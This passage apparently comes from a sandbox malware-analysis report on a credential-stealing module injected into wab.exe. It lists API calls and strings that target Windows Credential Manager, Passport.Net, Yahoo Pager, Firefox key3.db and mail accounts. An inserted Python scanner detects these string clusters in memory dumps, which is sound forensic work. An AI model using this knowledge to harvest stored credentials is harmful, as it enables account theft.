                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e64782263ff5605526e0fe757cea6ed3191f710ccf3b0afa5e67e353afe61262
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E301D8B954070466FF202A628C42B8B37585F51758F024137FD067D2D3E37E87748A4E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%
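Added example (not part of the Joe Sandbox report or of the sample): the String IDs in the three entries above (imap/pop3/smtp, the *.csv/*.htm;*.html/*.txt/*.xml export filters, and global-salt/password-check) are the kind of cluster a responder greps a process dump for to confirm that the injected image carries a credential-recovery module rather than a lone, possibly benign, string. The Python scanner below searches a dump for each cluster as ASCII and as UTF-16LE, reports hits as virtual addresses relative to the load base (00400000 in this report), and only calls a cluster complete when every member string is present. The cluster names and grouping, the reading of global-salt/password-check as the entry names NSS uses in Firefox's legacy key3.db, and the embedded sample dump are this example's own assumptions, not data from the report.

```python
"""Triage scanner for the credential-stealer string clusters listed in the
function signatures above (added example, not part of the Joe Sandbox report).

Usage: python scan_dump.py <memory.dmp> [load_base_hex]
Without arguments it runs against the small constructed dump embedded below.
"""
from __future__ import annotations

import re
import sys

# Strings copied from the "String ID" fields of the report. The grouping into
# named clusters and the comments are this example's own interpretation.
CLUSTERS = {
    # _strcmpi routine at 004044FA/00404518: protocol names compared against
    # stored mail account settings.
    "mail_protocol_names": [b"imap", b"pop3", b"smtp"],
    # LoadStringA/sprintf routines reached from 0040BD88: save-as filters,
    # i.e. harvested data can be written out as CSV/HTML/TXT/XML.
    "report_export_filters": [b"*.csv", b"*.htm;*.html", b"*.txt", b"*.xml"],
    # memcmp routine at 00406129: "global-salt" and "password-check" are the
    # entry names NSS uses in Firefox's legacy key3.db (assumption stated in
    # the lead-in); code looking for them in a non-Firefox process is
    # browser-password recovery.
    "nss_key3db_markers": [b"global-salt", b"password-check"],
}


def find_all(dump: bytes, needle: bytes) -> list[int]:
    """Offsets of every occurrence of needle, stored as ASCII or as UTF-16LE."""
    wide = needle.decode("ascii").encode("utf-16-le")
    hits = set()
    for enc in (needle, wide):
        hits.update(m.start() for m in re.finditer(re.escape(enc), dump))
    return sorted(hits)


def scan(dump: bytes, base: int = 0) -> dict[str, dict[bytes, list[int]]]:
    """Map cluster -> string -> virtual addresses. base is the address the
    image was mapped at (00400000 for the dump in this report)."""
    return {
        name: {s: [base + off for off in find_all(dump, s)] for s in strings}
        for name, strings in CLUSTERS.items()
    }


def complete_clusters(dump: bytes) -> list[str]:
    """Clusters whose every member string is present. One stray "smtp" in a
    dump is not evidence; the complete set next to the other clusters is."""
    found = scan(dump)
    return sorted(
        name for name, hits in found.items() if all(hits[s] for s in CLUSTERS[name])
    )


# Constructed sample, not a real dump: the strings above laid out as NUL
# terminated ASCII, with "global-salt" stored as a wide string to exercise
# the UTF-16LE path.
SAMPLE_DUMP = (
    b"MZ" + b"\x00" * 62
    + b"imap\x00pop3\x00smtp\x00"
    + b"\x90" * 16
    + b"*.csv\x00*.htm;*.html\x00*.txt\x00*.xml\x00txt\x00"
    + "global-salt".encode("utf-16-le") + b"\x00\x00"
    + b"password-check\x00"
    + b"\x00" * 32
)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            data = fh.read()
        base = int(sys.argv[2], 16) if len(sys.argv) > 2 else 0
    else:
        data, base = SAMPLE_DUMP, 0x400000
    for name, hits in scan(data, base).items():
        for s, addrs in hits.items():
            print(f"{name:22} {s.decode():14} {[hex(a) for a in addrs]}")
    print("complete clusters:", complete_clusters(data))
```

Run it against the .sdmp file named in the Memory Dump Source lines with 400000 as the second argument to get addresses that can be compared directly with the ref: values in the entries above; a cluster that comes back incomplete is a reason to look at the dump by hand before calling it, not a reason to discard it.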

APIs
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: 61b661c510ad4b0743117b2440ebaa6c68aec67bf7d0c3759525eee1844cf9ab
• Instruction ID: 5b630ca211e00ee6ab232d4f5fe81ba50f7f923f282134244f429d4b925a3085
• Opcode Fuzzy Hash: 61b661c510ad4b0743117b2440ebaa6c68aec67bf7d0c3759525eee1844cf9ab
• Instruction Fuzzy Hash: 7501A272E0AD31A7E1257A76554135BE3686F04B29F05024FB904772428B6C7C5445DE
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetClientRect.USER32(?,?), ref: 004016A2
• GetSystemMetrics.USER32(00000015), ref: 004016B0
• GetSystemMetrics.USER32(00000014), ref: 004016BC
• BeginPaint.USER32(?,?), ref: 004016D6
• DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E5
                                                                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 004016F2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 19018683-0
                                                                                                                                                                                                                      • Opcode ID: d93d450dc478f7866c229f4a037813e0caab4cabbf567c971482d52d831a5164
                                                                                                                                                                                                                      • Instruction ID: 724a62348f30ed3062fc78c586e299175c66965872e24402369681ac2eeab922
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d93d450dc478f7866c229f4a037813e0caab4cabbf567c971482d52d831a5164
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0701FB76900619AFDF04DFA8DC499FE7BBDFB45301F00046AEA11AB295DAB1A914CF90
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 0040C352
                                                                                                                                                                                                                      • SetFocus.USER32(?,?,?), ref: 0040C3F8
                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000000), ref: 0040C4F5
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: DestroyFocusInvalidateRectWindow
                                                                                                                                                                                                                      • String ID: XgD$rY@
                                                                                                                                                                                                                      • API String ID: 3502187192-1347721759
                                                                                                                                                                                                                      • Opcode ID: 0547b1f3527a77a0dd6e05b9ba2639b12fbf26f65146718a21d2de361d27d990
                                                                                                                                                                                                                      • Instruction ID: f774ea8d8eb1800fd2ad86f321479c1d669f6cdc6fcff53b53818c93aeeaee42
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0547b1f3527a77a0dd6e05b9ba2639b12fbf26f65146718a21d2de361d27d990
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F518630A04701DBCB34BB658885D9AB3E0BF51724F44C63FF4656B2E2C779A9818B8D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00406376
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00406389
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040639C
                                                                                                                                                                                                                        • Part of subcall function 00404883: memset.MSVCRT ref: 004048BD
                                                                                                                                                                                                                        • Part of subcall function 00404883: memset.MSVCRT ref: 004048D1
                                                                                                                                                                                                                        • Part of subcall function 00404883: memset.MSVCRT ref: 004048E5
                                                                                                                                                                                                                        • Part of subcall function 00404883: memcpy.MSVCRT ref: 004048F7
                                                                                                                                                                                                                        • Part of subcall function 00404883: memcpy.MSVCRT ref: 00404909
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 004063E0
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 004063F3
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00406420
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00406435
                                                                                                                                                                                                                        • Part of subcall function 0040625B: memcpy.MSVCRT ref: 00406287
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 438689982-0
                                                                                                                                                                                                                      • Opcode ID: c11b14cc7bfefcbecd474d69538c451392e9e517f6ba4719ba6800d6460efb6e
                                                                                                                                                                                                                      • Instruction ID: a962c966a65fcbb98db0a5903e2df7d2d9caef1a51b72161af640e80cc8fe1a9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c11b14cc7bfefcbecd474d69538c451392e9e517f6ba4719ba6800d6460efb6e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 744140B290050DBEEB51DAE8CC41EEFBB7CAB4C704F004476F704F6051E635AA598BA6
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00443E43
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00443E5C
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00443E70
                                                                                                                                                                                                                        • Part of subcall function 00443946: strlen.MSVCRT ref: 00443953
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00443E8C
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00443EB1
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00443EC7
                                                                                                                                                                                                                        • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CFB8
                                                                                                                                                                                                                        • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFE4
                                                                                                                                                                                                                        • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFFA
                                                                                                                                                                                                                        • Part of subcall function 0040CFC5: memcpy.MSVCRT ref: 0040D031
                                                                                                                                                                                                                        • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D03B
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00443F07
                                                                                                                                                                                                                        • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF6A
                                                                                                                                                                                                                        • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF94
                                                                                                                                                                                                                        • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D00C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset$strlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2142929671-0
                                                                                                                                                                                                                      • Opcode ID: 1fb1ec72e13faa5c4450662030dd608fc909945337c7cb58045cb7f4428127cf
                                                                                                                                                                                                                      • Instruction ID: 7aa756fa7cbdb75c5c05895f31091f080fe59031f56f6a961c38bdf577465876
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1fb1ec72e13faa5c4450662030dd608fc909945337c7cb58045cb7f4428127cf
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D513BB290011EAADB10EF55CC81AEEB3B9BF44218F5445BAE509E7141EB34AB49CF94
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                                                                                                                                                                                                        • Part of subcall function 004045D6: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                                                                                                                                                                                                        • Part of subcall function 004045D6: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                                                                                                                                                                                                        • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                                                                                                                                                                                                        • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                                                                                                                                                                                                        • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                                                                                                                                                                                                        • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                                                                                                                                                                                                        • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                                        • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F123
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F133
• _mbscpy.MSVCRT ref: 0040F144
• LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F151
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
• String ID: Passport.Net\*
• API String ID: 2329438634-3671122194
• Opcode ID: c0e35485f09b5a24e447f0910c227e843a67b38e8fc9a121e48f37b6dcdb3ffc
• Instruction ID: b181dd8ad3303716fcb3fe51c6d72bcd9c0cca2a33dd7682b011125bf867cc1e
• Opcode Fuzzy Hash: c0e35485f09b5a24e447f0910c227e843a67b38e8fc9a121e48f37b6dcdb3ffc
• Instruction Fuzzy Hash: B5316D76900109EBDB20EF96DD45EAEB7B9EF85701F0000BAE604E7291D7389A05CB68
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00403158: strchr.MSVCRT ref: 0040326D
• memset.MSVCRT ref: 004032FD
• GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403317
• strchr.MSVCRT ref: 0040334C
  • Part of subcall function 004023D7: _mbsicmp.MSVCRT ref: 0040240F
• strlen.MSVCRT ref: 0040338E
  • Part of subcall function 004023D7: _mbscmp.MSVCRT ref: 004023EB
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
• String ID: Personalities
• API String ID: 2103853322-4287407858
• Opcode ID: 4d90838e2d1a2817d3f702c1c820bc4a99c4f205016c2976f5c78779a4109539
• Instruction ID: 94df084552130989d7eb446100fdb0be3a34b05fea2c71b6ffce82199638926a
• Opcode Fuzzy Hash: 4d90838e2d1a2817d3f702c1c820bc4a99c4f205016c2976f5c78779a4109539
• Instruction Fuzzy Hash: 5921BA71B04158AADB11EF65DC81ADDBB6C9F10309F1400BBFA44F7281DA78DB46866D
Uniqueness
• Uniqueness Score: -1.00%

APIs
• UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 004101EF
• UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 004101FC
• memcpy.MSVCRT ref: 00410238
Strings
• 00000000-0000-0000-0000-000000000000, xrefs: 004101F7
• 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 004101EA
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: FromStringUuid$memcpy
• String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
• API String ID: 2859077140-3316789007
• Opcode ID: 47d2852bcb6be23f486a4ed132040bb4fca7e7f7f1bca8e0f8c40ade59038cba
• Instruction ID: ae29383cbd57fcea5ed56c9c200a46c16443c4e74b3f506479b718b79cf0bdd8
• Opcode Fuzzy Hash: 47d2852bcb6be23f486a4ed132040bb4fca7e7f7f1bca8e0f8c40ade59038cba
• Instruction Fuzzy Hash: 1801C43790001CBADF019B94CC40EEB7BACEF4A354F004023FD55D6141E678EA8487A5
Uniqueness
• Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00443A57
  • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
  • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00443AC3
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: CloseOpenQueryValuememset
• String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
• API String ID: 1830152886-1703613266
• Opcode ID: 650c04e09b991093e9736741da7e0d3a8797bac6cd011315facee49111a37a9d
• Instruction ID: 86b235c3fd45d03c271013e996efd952a38f3d6ae4618920ee3f021b32bc4f63
• Opcode Fuzzy Hash: 650c04e09b991093e9736741da7e0d3a8797bac6cd011315facee49111a37a9d
• Instruction Fuzzy Hash: 500192B6900118BBEB10AA55CD01FAE7A6C9F90715F140076FF08F2212E379DF5587A9
Uniqueness
• Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00409031
• GetPrivateProfileStringA.KERNEL32(00451308,0000000A,0044551F,?,00001000,00451200), ref: 00409053
• _mbscpy.MSVCRT ref: 0040906D
Strings
• {?@ UD, xrefs: 0040900D
• <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 0040901A
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: PrivateProfileString_mbscpymemset
• String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>${?@ UD
• API String ID: 408644273-2682877464
• Opcode ID: 378cf609773933abd0cbf0de7e3743951131b1a096d6e983a9466431b2c11096
• Instruction ID: 644781a60c69e86f7c2c511092586478b4ed4a6ca21543a67b17e89033411e60
• Opcode Fuzzy Hash: 378cf609773933abd0cbf0de7e3743951131b1a096d6e983a9466431b2c11096
• Instruction Fuzzy Hash: 53F0E9729041987BEB129764EC01FCA77AC9B4974BF1000E6FB49F10C2D5F89EC48AAD
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: ErrorLastMessagesprintf
• String ID: Error$Error %d: %s
• API String ID: 1670431679-1552265934
• Opcode ID: 69570e8fca1396db75b798702dd88894c728b3c47429f38a677bbfbefaa49fd2
• Instruction ID: c7de35334a9b91ea45d990eb2cc533a67ee34048a8af2c328f2cc0c5e5106846
• Opcode Fuzzy Hash: 69570e8fca1396db75b798702dd88894c728b3c47429f38a677bbfbefaa49fd2
• Instruction Fuzzy Hash: BBF0ECBA90010877DB11BB54DC05F9A77FCBB81304F1500B6FA45F2142EE74DA058F99
Uniqueness
• Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,762571C0,00405E9E,00000000), ref: 00410912
• GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00410920
• FreeLibrary.KERNEL32(00000000), ref: 00410938
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: SHAutoComplete$shlwapi.dll
• API String ID: 145871493-1506664499
• Opcode ID: f25734f4fc4b11147bd7f5e2528d9bf4594faa664b5814fe0a2756d8d7966d13
• Instruction ID: 7569959bf229cfaf5f1ab8cb2858e1476927bfd88fe16924fdc565eaa6c9b3dd
• Opcode Fuzzy Hash: f25734f4fc4b11147bd7f5e2528d9bf4594faa664b5814fe0a2756d8d7966d13
• Instruction Fuzzy Hash: 15D05B797006107BFB215735BC08FEF6AE5DFC77527050035F950E1151CB648C42896A
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$memcpy
                                                                                                                                                                                                                      • String ID: $no query solution
                                                                                                                                                                                                                      • API String ID: 368790112-326442043
                                                                                                                                                                                                                      • Opcode ID: d1b20270b8fca8508a10612e54657d8b0a662355ac249add9ed08d121aaec26c
                                                                                                                                                                                                                      • Instruction ID: 5801c9734c6bd427e286c4e355069e6ae2e92931dd4aa2b8c604a71db9229eec
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d1b20270b8fca8508a10612e54657d8b0a662355ac249add9ed08d121aaec26c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D012AC75D006199FCB24CF99D481AAEF7F1FF08314F14915EE899AB351E338A981CB98
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430087
                                                                                                                                                                                                                      • foreign key on %s should reference only one column of table %T, xrefs: 0043005F
                                                                                                                                                                                                                      • unknown column "%s" in foreign key definition, xrefs: 0043027A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                      • API String ID: 3510742995-272990098
                                                                                                                                                                                                                      • Opcode ID: ba7cc926a2513b3f0d61d7686d9ea4b43c1dda64fb95451b7aee5590be9ae86f
                                                                                                                                                                                                                      • Instruction ID: b65499b1f20d22348a3d217da3c858198d90c87fbf4aa33eef889ec12c855700
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba7cc926a2513b3f0d61d7686d9ea4b43c1dda64fb95451b7aee5590be9ae86f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BFA14C75A00209DFCB14CF99D590AAEBBF1FF48304F14869AE805AB312D779EE51CB94
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                      • String ID: H
                                                                                                                                                                                                                      • API String ID: 2221118986-2852464175
                                                                                                                                                                                                                      • Opcode ID: 82ed15864ef5b3a3dd0266e33bdbcb26a787e81eb1be7ca6d5995a5f4ce5c711
                                                                                                                                                                                                                      • Instruction ID: 0231d824907604898156c72f74438a53b00a2a6e63cdef361d574d9feb60fc4e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 82ed15864ef5b3a3dd0266e33bdbcb26a787e81eb1be7ca6d5995a5f4ce5c711
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D915775C00219DBDF20CF95C881AAEF7B5FF48304F14949AE959BB241E334AA85CFA5
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                                                                                                      • String ID: @ $SQLite format 3
                                                                                                                                                                                                                      • API String ID: 231171946-3708268960
                                                                                                                                                                                                                      • Opcode ID: 5952f075a97c97ad06d3c6058b6006b849409e8323ae21947051dcee29b786b4
                                                                                                                                                                                                                      • Instruction ID: 154dd893183b882ddc8616fc7eef56b16fb129afe1b119523047def7d92feb70
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5952f075a97c97ad06d3c6058b6006b849409e8323ae21947051dcee29b786b4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C451B1B1E00604AFDB20DF69C881BDAB7F5AF54308F14056FD44597741E778EA84CBA9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                                                                                      • API String ID: 3510742995-3170954634
                                                                                                                                                                                                                      • Opcode ID: d7603b0dda69ecf518d4b766e7e4f504cd7a7b4266dab8eccfe297bae9d2bc32
                                                                                                                                                                                                                      • Instruction ID: 0d7bce0817bf65c9dfa0535c92c7df176da35528cc665cc261d5cec065e4eab6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7603b0dda69ecf518d4b766e7e4f504cd7a7b4266dab8eccfe297bae9d2bc32
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4361C031A046259FDB14DFA4D480BAEBBF1FF48304F55849AE904AB392D738ED51CB98
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                      • String ID: winWrite1$winWrite2
                                                                                                                                                                                                                      • API String ID: 438689982-3457389245
                                                                                                                                                                                                                      • Opcode ID: 0d7f83051426e72d393f7901bd0e4f2f845d9ffb714df67e86fd0046f80122d9
                                                                                                                                                                                                                      • Instruction ID: 411cc920c71d47ae3c136763a4be7e00f30539a89a3c59ace8e577baf045dca9
